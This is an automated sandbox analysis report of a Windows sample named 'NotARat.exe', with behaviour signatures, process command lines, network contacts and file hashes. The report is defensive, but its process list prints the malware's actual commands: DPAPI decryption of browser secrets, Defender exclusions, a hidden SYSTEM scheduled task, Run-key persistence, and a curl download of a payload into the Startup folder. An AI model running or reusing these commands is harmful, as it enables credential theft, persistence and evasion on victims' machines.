Analysis Overview
SHA256
2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08
Threat Level: Likely malicious
The file NotARat.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Hide Artifacts: Hidden Window
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Detects videocard installed
Enumerates processes with tasklist
Modifies registry key
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 12:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 12:42
Reported
2024-06-26 12:43
Platform
win10v2004-20240611-en
Max time kernel
5s
Max time network
10s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NotARat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NotARat.exe | N/A |
Reads user/profile data of web browsers
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NotARat.exe
"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp" "c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp" "c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\NotARat.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.203:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 203.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\AppData\Local\Temp\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
memory/4684-72-0x00007FF9F7413000-0x00007FF9F7415000-memory.dmp
memory/4684-73-0x0000025E06EF0000-0x0000025E06F12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_psgny50s.boa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4684-83-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
memory/4684-84-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
memory/4684-85-0x0000025E21690000-0x0000025E216D4000-memory.dmp
memory/4684-86-0x0000025E21AB0000-0x0000025E21B26000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline
| MD5 | 40ee34a07d711f250ff9b3db33200775 |
| SHA1 | 8d10361f431c5b0fa2dea43e50ace98200df4e56 |
| SHA256 | c077e18005105bb085d28bfd7af097b7006171f1106bcc0d0253b335f1b6c41d |
| SHA512 | 3328cb64bf0710f60594e86c67d8ed1dbb57da5f9c2e9bd3e6101c982941d581357c181a9e778d2a1b5c945870728a67da9540db793159cd937f2c2df337233e |
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP
| MD5 | 4cb085e7d9c7d80b7e6a5b344dfc1f7a |
| SHA1 | 1e5c416734ea81f75608744caefe2f24a295db66 |
| SHA256 | 41f2a7145c9d98c44e8a2c81d3b7cb4bbefa322bb04236b8b823fe81b06174bf |
| SHA512 | a84309390fe72ba6e6019f082a162ef8fc01e33dc5ccc0cb7c3f20a9298c5578d15fb0dd4827354d780b410b2110f4dc888b4131f284d412c417ef745919a746 |
C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp
| MD5 | bebc6a893895a28a4a7055b53cc0a771 |
| SHA1 | 38cf7ab944ac1782d0b03f9764dab940caa1e840 |
| SHA256 | 4cb7b6ec0f96dcf276e9cfeef0b56d8ba4afb319709f15fc6050b2a4b0c9b402 |
| SHA512 | 6ec569b179e539d92aec8c1db49b356a304b9b589241e529eb28fdbe222261c79a802f915c07aaf1fd7309e97c02266a20892d7bde2521322b7da16ccf3c5e29 |
C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.dll
| MD5 | c2671dbb00382d83e362947523d39350 |
| SHA1 | e4cc7555fd54941d906f92758cab37a2c2a34a10 |
| SHA256 | b59abad7e01c08608fe4de16190f853069f8341835f84e15557a4636a301e383 |
| SHA512 | 44b6ec9729278173a3717c2d628c7e69634b7e3159e79842b5426568f2f1f653d424054f4f5c658025a1b4683ec7a6eaa0fa7f665419ad40c3901f5ec9d72a32 |
memory/4684-99-0x0000025E06F50000-0x0000025E06F58000-memory.dmp
memory/4684-103-0x00007FF9F7410000-0x00007FF9F7ED1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/3988-115-0x000001C53F570000-0x000001C53F5C0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f79387492e5d2264cb94e2f480feaf78 |
| SHA1 | 13f478f478bf824d8cccb611ac9b2645d5523c93 |
| SHA256 | f7d942ea9e79af246b7a4e461133ed9434f980e837a8b96f1e35f856ddead9e7 |
| SHA512 | c1a16d6c0edeba6659f08ae115b4ed5c496063d9e4339ff0869a85295798fb66281dba43b6de8118bda69db0d34a65966f84c522b9adcf94581934438c015479 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 390d7206a5094d20f7a129fabb9695d9 |
| SHA1 | 4b45920bd622c5356a5b1b991cc4dc9e3b6cb7b0 |
| SHA256 | 8daae1b798f946102fb352c485d4c86f2f8feb651cb7d9f330e9d0f488d40ed5 |
| SHA512 | dfebf2b6b94021f6bf4973c5d1d34324aea2aa0fa444a2a9024c3ba78e13630eb8fd201fb3b08eb512b89ef8b6e1d1161720c0618d0de10ebb5000c249e89384 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 718273a5fd30c297d410e340722fc6db |
| SHA1 | cf82ae296e8b006db9fb51ced40b57db1cc4e698 |
| SHA256 | 6ce02325b6861901177d845dd9d3a6de67790d53e8b3942b0d4348d650d0c3b7 |
| SHA512 | 133d0d22f630541b0a56e3a3cb123516e9b9b78ddd141cb47e33d9ba8ec1aba79161be1fe2cca263b0753d6f1eb9e93581479dce0230fabf35b5f694fdbf4572 |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline
| MD5 | e26515e913261f3b9ed1189606f1371e |
| SHA1 | bb1a64d55de75515f14b24296750cb6777ac9c05 |
| SHA256 | eec480bc88ea2fcc2e3df0cf7475ca423e16a8d780c883a1ef0694db2c786690 |
| SHA512 | 328dddcac965a5a978c8b2e7141ccbd693463192886e7fcb03c76431dbd23e93e91415ea22547bba6f8f1f1d2fe0b0ffaf15778f8ccb9a59504f0f37116e953c |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP
| MD5 | 263525609d6154a748a4030d53cfc196 |
| SHA1 | 72d4db97cd554b9252c3c6479bd3ce2a2d208d56 |
| SHA256 | c27bd4e13f51d0c1ad1e43a97cbcde7468e7654cdc28303b4dd0ec0da5369e44 |
| SHA512 | 6748ba5a421ff8e291e98524a36519ec41f406f76dab19fda33c9ccd4e3210b82eb2376c5832fc827a8d9e5127062cad8213f7f58ac037e9f47ff2633ddc4900 |
C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp
| MD5 | fc8911df2ebdbbe181344d9711bcb7d8 |
| SHA1 | b44d5a8c07dcbcee6263f7e3edc873e3adff1811 |
